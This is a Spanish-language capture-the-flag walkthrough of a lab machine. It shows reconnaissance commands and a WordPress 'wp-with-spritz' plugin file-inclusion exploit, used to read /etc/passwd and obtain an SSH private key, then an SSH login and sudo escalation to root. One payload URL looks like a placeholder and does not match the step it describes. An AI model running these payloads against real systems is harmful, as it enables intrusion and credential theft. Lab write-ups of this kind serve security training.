nmap -A -p- -oA cms 172.31.1.8 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210714092325.png

nmap -sC -sV -O -p- -oA cms 172.31.1.8

nmap -sU -O -p- -oA cms-udp 172.31.1.8

nikto -h 172.31.1.8:80

gobuster dir -k -u http://172.31.1.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vamos a la pagina http://172.31.1.8 Nos damos cuenta que es una pagina de wordpress

wpscan --url http://172.31.1.8 -e -ap --plugin-detection aggressive

Pasted image 20210714093131.png

search spritz

searchsploit -m 44544.php

Pasted image 20210714094513.png

cat 44544.php

Pasted image 20210714094531.png

Nos metemos a las siguientes urls y encontramos el usuario angel

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Pasted image 20210714094748.png

Despues copiamos la llave privada de este lugar y creamos un archivo llamado id_rsa:

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Pasted image 20210714095220.png

chmod 400 id_rsa

ssh angel@172.31.1.8 -i id_rsa

Pasted image 20210714095956.png

sudo -l

sudo -i

Pasted image 20210714100041.png

boxes

copyright©2022 Cu3rv0x all rights reserved